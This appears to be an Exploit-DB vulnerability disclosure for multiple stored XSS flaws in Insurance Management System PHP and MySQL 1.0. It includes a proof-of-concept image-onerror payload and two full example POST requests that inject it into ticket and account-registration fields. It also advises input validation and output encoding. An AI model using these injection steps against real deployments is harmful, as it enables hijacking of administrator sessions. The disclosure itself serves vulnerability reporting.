Insurance Management System PHP and MySQL 1.0 - Multiple Stored XSS

vendor:

Insurance Management System PHP and MySQL

by:

Hakkı TOKLU

4.1

CVSS

MEDIUM

Stored Cross-Site Scripting (XSS)

CWE

Product Name: Insurance Management System PHP and MySQL

Affected Version From: 1

Affected Version To: 1

Patch Exists: NO

Related CWE:

CPE: a:insurance_management_system_php_and_mysql:1.0

Metasploit:

Other Scripts:

Platforms Tested: Windows 11 / PHP 8.1 & XAMPP 3.3.0

2024

Insurance Management System PHP and MySQL 1.0 – Multiple Stored XSS

The Insurance Management System PHP and MySQL 1.0 allows for multiple stored cross-site scripting (XSS) vulnerabilities. An attacker can inject malicious payloads, such as <img src=x onerror=prompt("xss")>, into various input fields like Subject, Description, fname, lname, city, and street. When an admin views specific pages like Support Tickets or Users, the XSS payloads are executed.

Mitigation:

To mitigate these vulnerabilities, input validation and output encoding should be implemented. Additionally, limiting the types of characters that can be entered in input fields can prevent the execution of malicious scripts.

Source

Exploit-DB raw data:

# Exploit Title:Insurance Management System PHP and MySQL 1.0 - Multiple
Stored XSS
# Date: 2024-02-08
# Exploit Author: Hakkı TOKLU
# Vendor Homepage: https://www.sourcecodester.com
# Software Link:
https://www.sourcecodester.com/php/16995/insurance-management-system-php-mysql.html
# Version: 1.0
# Tested on: Windows 11 / PHP 8.1 & XAMPP 3.3.0

Support Ticket

Click on Support Tickets > Generate and add payload <img src=x onerror=prompt("xss")> to Subject and Description fields, then send the request. When admin visits the Support Tickets page, XSS will be triggered.

   Example Request : 
	    POST /e-insurance/Script/user/core/new_ticket HTTP/1.1
		Host: localhost
		Content-Type: application/x-www-form-urlencoded
		Content-Length: 139
		Cookie: PHPSESSID=17ot0ij8idrm2br6mmmc54fg15; __insuarance__logged=1; __insuarance__key=LG3LFIBJCN9DKVXKYS41

		category=4&subject=%3Cimg+src%3Dx+onerror%3Dprompt%28%22xss%22%29%3E&description=%3Cimg+src%3Dx+onerror%3Dprompt%28%22xss%22%29%3E&submit=1

Create Account

Click on New Account button on login page, then fill the fields. Inject <img src=x onerror=prompt("xss")> payloads to fname, lname, city and street parameter, then click Create Account button. XSS will be triggered when admin visits Users page.

	Example Request : 
		POST /e-insurance/Script/core/new_account HTTP/1.1
		Host: localhost
		Content-Type: application/x-www-form-urlencoded
		Content-Length: 303
		Cookie: PHPSESSID=17ot0ij8idrm2br6mmmc54fg15

		fname=%3Cimg+src%3Dx+onerror%3Dprompt%28%22xss%22%29%3E&lname=%3Cimg+src%3Dx+onerror%3Dprompt%28%22xss%22%29%3E&gender=Male&phone=5554443322&city=%3Cimg+src%3Dx+onerror%3Dprompt%28%22xss%22%29%3E&street=%3Cimg+src%3Dx+onerror%3Dprompt%28%22xss%22%29%3E&email=test1%40test.com&password=Test12345&submit=1